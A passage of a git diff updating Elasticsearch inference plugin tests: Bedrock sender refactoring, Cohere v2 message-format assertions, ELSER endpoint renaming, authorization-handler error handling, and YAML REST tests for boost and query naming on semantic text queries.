AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); requestSender.enqueue(AmazonBedrockExecutorTests.getTestInvokeResult(TEST_AMAZON_TITAN_EMBEDDINGS_RESULT)); - try (var sender = createSender(senderFactory, requestSender)) { + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + try (var sender = createSender(senderFactory)) { sender.start(); var model = AmazonBedrockEmbeddingsModelTests.createModel( @@ -92,10 +120,10 @@ public void testCreateSender_SendsEmbeddingsRequestAndReceivesResponse() throws } public void testCreateSender_SendsCompletionRequestAndReceivesResponse() throws Exception { - var senderFactory = createSenderFactory(threadPool, Settings.EMPTY); var requestSender = new AmazonBedrockMockExecuteRequestSender(new AmazonBedrockMockClientCache(), mock(ThrottlerManager.class)); requestSender.enqueue(AmazonBedrockExecutorTests.getTestConverseResult("test response text")); - try (var sender = createSender(senderFactory, requestSender)) { + var senderFactory = createSenderFactory(threadPool, Settings.EMPTY, requestSender); + try (var sender = createSender(senderFactory)) { sender.start(); var model = AmazonBedrockChatCompletionModelTests.createModel( @@ -116,14 +144,19 @@ public void testCreateSender_SendsCompletionRequestAndReceivesResponse() throws } } - public static AmazonBedrockRequestSender.Factory createSenderFactory(ThreadPool threadPool, Settings settings) { + public static AmazonBedrockRequestSender.Factory createSenderFactory( + ThreadPool threadPool, + Settings settings, + AmazonBedrockMockExecuteRequestSender requestSender + ) { return new AmazonBedrockRequestSender.Factory( ServiceComponentsTests.createWithSettings(threadPool, settings), - mockClusterServiceEmpty() + mockClusterServiceEmpty(), + requestSender ); } - public static Sender createSender(AmazonBedrockRequestSender.Factory factory, AmazonBedrockExecuteOnlyRequestSender requestSender) { - return factory.createSender(requestSender); + public static Sender createSender(AmazonBedrockRequestSender.Factory factory) { + return factory.createSender(); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java index 75ce59b16a763..a3f0b01901009 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/anthropic/AnthropicServiceTests.java @@ -650,6 +650,15 @@ public void testGetConfiguration() throws Exception { "updatable": false, "type": "str", "supported_task_types": ["completion"] + }, + "max_tokens": { + "description": "The maximum number of tokens to generate before stopping.", + "label": "Max Tokens", + "required": true, + "sensitive": false, + "updatable": false, + "type": "int", + "supported_task_types": ["completion"] } } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java index 88d26d5d7eef1..6438a328f9fcf 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereActionCreatorTests.java @@ -209,7 +209,10 @@ public void testCreate_CohereCompletionModel_WithModelSpecified() throws IOExcep assertThat(webServer.requests().get(0).getHeader(HttpHeaders.AUTHORIZATION), is("Bearer secret")); var requestMap = entityAsMap(webServer.requests().get(0).getBody()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "model", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "model", "stream", false)) + ); } } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java index 78b8b7bdeaf3e..6c5128956fc9b 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/action/CohereCompletionActionTests.java @@ -132,7 +132,10 @@ public void testExecute_ReturnsSuccessfulResponse_WithModelSpecified() throws IO ); var requestMap = entityAsMap(webServer.requests().get(0).getBody()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "model", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "model", "stream", false)) + ); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java index 2fb51ca8ca457..6003a58bf0340 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/request/v2/CohereV2CompletionRequestTests.java @@ -46,7 +46,10 @@ public void testCreateRequest() throws IOException { assertThat(httpPost.getLastHeader(CohereUtils.REQUEST_SOURCE_HEADER).getValue(), is(CohereUtils.ELASTIC_REQUEST_SOURCE)); var requestMap = entityAsMap(httpPost.getEntity().getContent()); - assertThat(requestMap, is(Map.of("message", "abc", "model", "required model id", "stream", false))); + assertThat( + requestMap, + is(Map.of("messages", List.of(Map.of("role", "user", "content", "abc")), "model", "required model id", "stream", false)) + ); } public void testDefaultUrl() { @@ -88,6 +91,6 @@ public void testXContents() throws IOException { String xContentResult = Strings.toString(builder); assertThat(xContentResult, CoreMatchers.is(""" - {"message":"some input","model":"model","stream":false}""")); + {"messages":[{"role":"user","content":"some input"}],"model":"model","stream":false}""")); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java index 4a60dc5033e22..5d7a76a26e597 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/cohere/response/CohereCompletionResponseEntityTests.java @@ -64,6 +64,42 @@ public void testFromResponse_CreatesResponseEntityForText() throws IOException { assertThat(chatCompletionResults.getResults().get(0).content(), is("result")); } + public void testFromResponseV2() throws IOException { + String responseJson = """ + { + "id": "abc123", + "finish_reason": "COMPLETE", + "message": { + "role": "assistant", + "content": [ + { + "type": "text", + "text": "Response from the llm" + } + ] + }, + "usage": { + "billed_units": { + "input_tokens": 1, + "output_tokens": 4 + }, + "tokens": { + "input_tokens": 2, + "output_tokens": 5 + } + } + } + """; + + ChatCompletionResults chatCompletionResults = CohereCompletionResponseEntity.fromResponse( + mock(Request.class), + new HttpResult(mock(HttpResponse.class), responseJson.getBytes(StandardCharsets.UTF_8)) + ); + + assertThat(chatCompletionResults.getResults().size(), is(1)); + assertThat(chatCompletionResults.getResults().get(0).content(), is("Response from the llm")); + } + public void testFromResponse_FailsWhenTextIsNotPresent() { String responseJson = """ { diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java index 236a6be3d742d..6ce484954d3ce 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/ElasticInferenceServiceTests.java @@ -1243,7 +1243,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() "task_types": ["chat"] }, { - "model_name": "elser-v2", + "model_name": "elser_model_2", "task_types": ["embed/text/sparse"] }, { @@ -1270,7 +1270,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() is( List.of( new InferenceService.DefaultConfigId( - ".elser-v2-elastic", + ".elser-2-elastic", MinimalServiceSettings.sparseEmbedding(ElasticInferenceService.NAME), service ), @@ -1306,7 +1306,7 @@ public void testDefaultConfigs_Returns_DefaultEndpoints_WhenTaskTypeIsCorrect() service.defaultConfigs(listener); var models = listener.actionGet(TIMEOUT); assertThat(models.size(), is(4)); - assertThat(models.get(0).getConfigurations().getInferenceEntityId(), is(".elser-v2-elastic")); + assertThat(models.get(0).getConfigurations().getInferenceEntityId(), is(".elser-2-elastic")); assertThat(models.get(1).getConfigurations().getInferenceEntityId(), is(".multilingual-embed-v1-elastic")); assertThat(models.get(2).getConfigurations().getInferenceEntityId(), is(".rainbow-sprinkles-elastic")); assertThat(models.get(3).getConfigurations().getInferenceEntityId(), is(".rerank-v1-elastic")); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java index d8c8c9e5b7abf..617ddef5a9910 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationHandlerTests.java @@ -67,6 +67,78 @@ public void init() throws Exception { modelRegistry = getInstanceFromNode(ModelRegistry.class); } + public void testSecondAuthResultRevokesAuthorization() throws Exception { + var callbackCount = new AtomicInteger(0); + // we're only interested in two authorization calls which is why I'm using a value of 2 here + var latch = new CountDownLatch(2); + final AtomicReference handlerRef = new AtomicReference<>(); + + Runnable callback = () -> { + // the first authorization response contains a streaming task so we're expecting to support streaming here + if (callbackCount.incrementAndGet() == 1) { + assertThat(handlerRef.get().supportedTaskTypes(), is(EnumSet.of(TaskType.CHAT_COMPLETION))); + } + latch.countDown(); + + // we only want to run the tasks twice, so advance the time on the queue + // which flags the scheduled authorization request to be ready to run + if (callbackCount.get() == 1) { + taskQueue.advanceTime(); + } else { + try { + handlerRef.get().close(); + } catch (IOException e) { + // ignore + } + } + }; + + var requestHandler = mockAuthorizationRequestHandler( + ElasticInferenceServiceAuthorizationModel.of( + new ElasticInferenceServiceAuthorizationResponseEntity( + List.of( + new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( + "rainbow-sprinkles", + EnumSet.of(TaskType.CHAT_COMPLETION) + ) + ) + ) + ), + ElasticInferenceServiceAuthorizationModel.of(new ElasticInferenceServiceAuthorizationResponseEntity(List.of())) + ); + + handlerRef.set( + new ElasticInferenceServiceAuthorizationHandler( + createWithEmptySettings(taskQueue.getThreadPool()), + modelRegistry, + requestHandler, + initDefaultEndpoints(), + EnumSet.of(TaskType.SPARSE_EMBEDDING, TaskType.CHAT_COMPLETION), + null, + mock(Sender.class), + ElasticInferenceServiceSettingsTests.create(null, TimeValue.timeValueMillis(1), TimeValue.timeValueMillis(1), true), + callback + ) + ); + + var handler = handlerRef.get(); + handler.init(); + taskQueue.runAllRunnableTasks(); + latch.await(Utils.TIMEOUT.getSeconds(), TimeUnit.SECONDS); + + // this should be after we've received both authorization responses, the second response will revoke authorization + + assertThat(handler.supportedStreamingTasks(), is(EnumSet.noneOf(TaskType.class))); + assertThat(handler.defaultConfigIds(), is(List.of())); + assertThat(handler.supportedTaskTypes(), is(EnumSet.noneOf(TaskType.class))); + + PlainActionFuture> listener = new PlainActionFuture<>(); + handler.defaultConfigs(listener); + + var configs = listener.actionGet(); + assertThat(configs.size(), is(0)); + } + public void testSendsAnAuthorizationRequestTwice() throws Exception { var callbackCount = new AtomicInteger(0); // we're only interested in two authorization calls which is why I'm using a value of 2 here @@ -104,6 +176,10 @@ public void testSendsAnAuthorizationRequestTwice() throws Exception { ElasticInferenceServiceAuthorizationModel.of( new ElasticInferenceServiceAuthorizationResponseEntity( List.of( + new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( + "abc", + EnumSet.of(TaskType.SPARSE_EMBEDDING) + ), new ElasticInferenceServiceAuthorizationResponseEntity.AuthorizedModel( "rainbow-sprinkles", EnumSet.of(TaskType.CHAT_COMPLETION) @@ -188,13 +264,13 @@ private static Map initDefaultEndpoints() { ), MinimalServiceSettings.chatCompletion(ElasticInferenceService.NAME) ), - "elser-v2", + "elser-2", new DefaultModelConfig( new ElasticInferenceServiceSparseEmbeddingsModel( - defaultEndpointId("elser-v2"), + defaultEndpointId("elser-2"), TaskType.SPARSE_EMBEDDING, "test", - new ElasticInferenceServiceSparseEmbeddingsServiceSettings("elser-v2", null, null), + new ElasticInferenceServiceSparseEmbeddingsServiceSettings("elser-2", null, null), EmptyTaskSettings.INSTANCE, EmptySecretSettings.INSTANCE, ElasticInferenceServiceComponents.EMPTY_INSTANCE, diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java index 1c19285ea8bf1..570e34370fc8a 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elastic/authorization/ElasticInferenceServiceAuthorizationRequestHandlerTests.java @@ -8,6 +8,7 @@ package org.elasticsearch.xpack.inference.services.elastic.authorization; import org.apache.logging.log4j.Logger; +import org.elasticsearch.ElasticsearchException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.settings.Settings; @@ -18,6 +19,7 @@ import org.elasticsearch.test.http.MockResponse; import org.elasticsearch.test.http.MockWebServer; import org.elasticsearch.threadpool.ThreadPool; +import org.elasticsearch.xcontent.XContentParseException; import org.elasticsearch.xpack.core.inference.results.ChatCompletionResults; import org.elasticsearch.xpack.inference.external.http.HttpClientManager; import org.elasticsearch.xpack.inference.external.http.sender.HttpRequestSender; @@ -38,13 +40,14 @@ import static org.elasticsearch.xpack.inference.Utils.mockClusterServiceEmpty; import static org.elasticsearch.xpack.inference.external.http.Utils.getUrl; import static org.elasticsearch.xpack.inference.external.http.retry.RetryingHttpSender.MAX_RETIES; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static org.mockito.ArgumentMatchers.any; import static org.mockito.Mockito.doAnswer; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.times; import static org.mockito.Mockito.verify; -import static org.mockito.Mockito.verifyNoMoreInteractions; import static org.mockito.Mockito.when; public class ElasticInferenceServiceAuthorizationRequestHandlerTests extends ESTestCase { @@ -135,22 +138,17 @@ public void testGetAuthorization_FailsWhenAnInvalidFieldIsFound() throws IOExcep PlainActionFuture listener = new PlainActionFuture<>(); authHandler.getAuthorization(listener, sender); - var authResponse = listener.actionGet(TIMEOUT); - assertTrue(authResponse.getAuthorizedTaskTypes().isEmpty()); - assertTrue(authResponse.getAuthorizedModelIds().isEmpty()); - assertFalse(authResponse.isAuthorized()); + var exception = expectThrows(XContentParseException.class, () -> listener.actionGet(TIMEOUT)); + assertThat(exception.getMessage(), containsString("failed to parse field [models]")); - var loggerArgsCaptor = ArgumentCaptor.forClass(String.class); - verify(logger).warn(loggerArgsCaptor.capture()); - var message = loggerArgsCaptor.getValue(); - assertThat( - message, - is( - "Failed to retrieve the authorization information from the Elastic Inference Service." - + " Encountered an exception: org.elasticsearch.xcontent.XContentParseException: [4:28] " - + "[ElasticInferenceServiceAuthorizationResponseEntity] failed to parse field [models]" - ) - ); + var stringCaptor = ArgumentCaptor.forClass(String.class); + var exceptionCaptor = ArgumentCaptor.forClass(Exception.class); + verify(logger).warn(stringCaptor.capture(), exceptionCaptor.capture()); + var message = stringCaptor.getValue(); + assertThat(message, containsString("failed to parse field [models]")); + + var capturedException = exceptionCaptor.getValue(); + assertThat(capturedException, instanceOf(XContentParseException.class)); } } @@ -196,7 +194,6 @@ public void testGetAuthorization_ReturnsAValidResponse() throws IOException { var message = loggerArgsCaptor.getValue(); assertThat(message, is("Retrieving authorization information from the Elastic Inference Service.")); - verifyNoMoreInteractions(logger); } } @@ -230,7 +227,6 @@ public void testGetAuthorization_OnResponseCalledOnce() throws IOException { var message = loggerArgsCaptor.getValue(); assertThat(message, is("Retrieving authorization information from the Elastic Inference Service.")); - verifyNoMoreInteractions(logger); } } @@ -252,20 +248,14 @@ public void testGetAuthorization_InvalidResponse() throws IOException { PlainActionFuture listener = new PlainActionFuture<>(); authHandler.getAuthorization(listener, sender); - var result = listener.actionGet(TIMEOUT); + var exception = expectThrows(ElasticsearchException.class, () -> listener.actionGet(TIMEOUT)); - assertThat(result, is(ElasticInferenceServiceAuthorizationModel.newDisabledService())); + assertThat(exception.getMessage(), containsString("Received an invalid response type from the Elastic Inference Service")); var loggerArgsCaptor = ArgumentCaptor.forClass(String.class); verify(logger).warn(loggerArgsCaptor.capture()); var message = loggerArgsCaptor.getValue(); - assertThat( - message, - is( - "Failed to retrieve the authorization information from the Elastic Inference Service." - + " Received an invalid response type: ChatCompletionResults" - ) - ); + assertThat(message, containsString("Failed to retrieve the authorization information from the Elastic Inference Service.")); } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java index fa0148ac69df5..d9ffddd62fb40 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/elasticsearch/ElserModelsTests.java @@ -19,21 +19,7 @@ public void testIsValidModel() { assertTrue(org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidModel(randomElserModel())); } - public void testIsValidEisModel() { - assertTrue( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidEisModel( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.ELSER_V2_MODEL - ) - ); - } - public void testIsInvalidModel() { assertFalse(org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidModel("invalid")); } - - public void testIsInvalidEisModel() { - assertFalse( - org.elasticsearch.xpack.inference.services.elasticsearch.ElserModels.isValidEisModel(ElserModels.ELSER_V2_MODEL_LINUX_X86) - ); - } } diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java index adffbb366fb02..90b5042d3dec4 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/SageMakerSchemaPayloadTestCase.java @@ -119,7 +119,7 @@ public final void testWithUnknownApiTaskSettings() { } } - public final void testUpdate() throws IOException { + public void testUpdate() throws IOException { var taskSettings = randomApiTaskSettings(); if (taskSettings != SageMakerStoredTaskSchema.NO_OP) { var otherTaskSettings = randomValueOtherThan(taskSettings, this::randomApiTaskSettings); diff --git a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java index 65dcd62bb149a..9e4cfc52e9568 100644 --- a/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java +++ b/x-pack/plugin/inference/src/test/java/org/elasticsearch/xpack/inference/services/sagemaker/schema/elastic/ElasticPayloadTestCase.java @@ -18,8 +18,8 @@ import java.util.List; import java.util.Map; -import static org.hamcrest.Matchers.equalTo; -import static org.hamcrest.Matchers.is; +import static org.elasticsearch.xpack.inference.services.InferenceSettingsTestCase.toMap; +import static org.hamcrest.Matchers.containsString; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.when; @@ -50,6 +50,7 @@ protected SageMakerModel mockModel(SageMakerElasticTaskSettings taskSettings) { return model; } + @Override public void testApiTaskSettings() { { var validationException = new ValidationException(); @@ -67,14 +68,21 @@ public void testApiTaskSettings() { var validationException = new ValidationException(); var actualApiTaskSettings = payload.apiTaskSettings(Map.of("hello", "world"), validationException); assertTrue(actualApiTaskSettings.isEmpty()); - assertFalse(validationException.validationErrors().isEmpty()); - assertThat( - validationException.validationErrors().get(0), - is(equalTo("task_settings is only supported during the inference request and cannot be stored in the inference endpoint.")) - ); + assertTrue(validationException.validationErrors().isEmpty()); } } + @Override + public void testUpdate() { + var taskSettings = randomApiTaskSettings(); + var otherTaskSettings = randomValueOtherThan(taskSettings, this::randomApiTaskSettings); + var e = assertThrows(ValidationException.class, () -> taskSettings.updatedTaskSettings(toMap(otherTaskSettings))); + assertThat( + e.getMessage(), + containsString("task_settings is only supported during the inference request and cannot be stored in the inference endpoint") + ); + } + public void testRequestWithRequiredFields() throws Exception { var request = new SageMakerInferenceRequest(null, null, null, List.of("hello"), false, InputType.UNSPECIFIED); var sdkByes = payload.requestBytes(mockModel(), request); diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml index 28093ba49e6cc..3898eb7de7c29 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/45_semantic_text_match.yml @@ -277,3 +277,126 @@ setup: query: "inference test" - match: { hits.total.value: 0 } + +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text match queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + index: + index: test-sparse-index + id: doc_1 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index + body: + query: + match: + inference_field: + query: "soccer" + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 5.700229E18, error: 1e15 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index + body: + query: + match: + inference_field: + query: "soccer" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 2.8501142E19, error: 1e16 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text match queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + index: + index: test-sparse-index + id: doc_1 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + index: + index: test-text-only-index + id: doc_2 + body: + inference_field: [ "It was a beautiful game", "Very competitive" ] + non_inference_field: "non inference test" + refresh: true + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index,test-text-only-index + body: + query: + match: + inference_field: + query: "beautiful" + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 1.1140361E19, error: 1e16 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 0.2876821, error: 1e-4 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-sparse-index,test-text-only-index + body: + query: + match: + inference_field: + query: "beautiful" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 5.5701804E19, error: 1e16 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 1.4384103, error: 1e-4 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml index f1cff512fd209..cc67b9235f0b4 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/46_semantic_text_sparse_vector.yml @@ -247,3 +247,100 @@ setup: - match: { hits.total.value: 2 } +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text sparse vector queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 3.7837332E17, error: 1e14 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 1.8918664E18, error: 1e15 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + +--- +"Apply boost and query name on multiple indices": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text sparse vector queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-sparse-vector-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + inference_id: sparse-inference-id + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 3.7837332E17, error: 1e14 } } + - not_exists: hits.hits.0.matched_queries + - close_to: { hits.hits.1._score: { value: 7.314424E8, error: 1e5 } } + - not_exists: hits.hits.1.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index,test-sparse-vector-index + body: + query: + sparse_vector: + field: inference_field + query: "inference test" + inference_id: sparse-inference-id + boost: 5.0 + _name: i-like-naming-my-queries + + - match: { hits.total.value: 2 } + - match: { hits.hits.0._id: "doc_1" } + - match: { hits.hits.1._id: "doc_2" } + - close_to: { hits.hits.0._score: { value: 1.8918664E18, error: 1e15 } } + - match: { hits.hits.0.matched_queries: [ "i-like-naming-my-queries" ] } + - close_to: { hits.hits.1._score: { value: 3.657212E9, error: 1e6 } } + - match: { hits.hits.1.matched_queries: [ "i-like-naming-my-queries" ] } diff --git a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml index 64ecb0f2d882c..d49e3a63848e3 100644 --- a/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml +++ b/x-pack/plugin/inference/src/yamlRestTest/resources/rest-api-spec/test/inference/47_semantic_text_knn.yml @@ -404,4 +404,116 @@ setup: - match: { hits.total.value: 4 } +--- +"Apply boost and query name on single index": + - requires: + cluster_features: "semantic_query_rewrite_interceptors.propagate_boost_and_query_name_fix" + reason: fix boosting and query name for semantic text knn queries. + + - skip: + features: [ "headers", "close_to" ] + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + query_vector_builder: + text_embedding: + model_text: test + + - match: { hits.total.value: 1 } + - match: { hits.hits.0._id: "doc_1" } + - close_to: { hits.hits.0._score: { value: 0.9990483, error: 1e-4 } } + - not_exists: hits.hits.0.matched_queries + + - do: + headers: + # Force JSON content type so that we use a parser that interprets the floating-point score as a double + Content-Type: application/json + search: + index: test-semantic-text-index + body: + query: + knn: + field: inference_field + k: 2 + num_candidates: 100 + 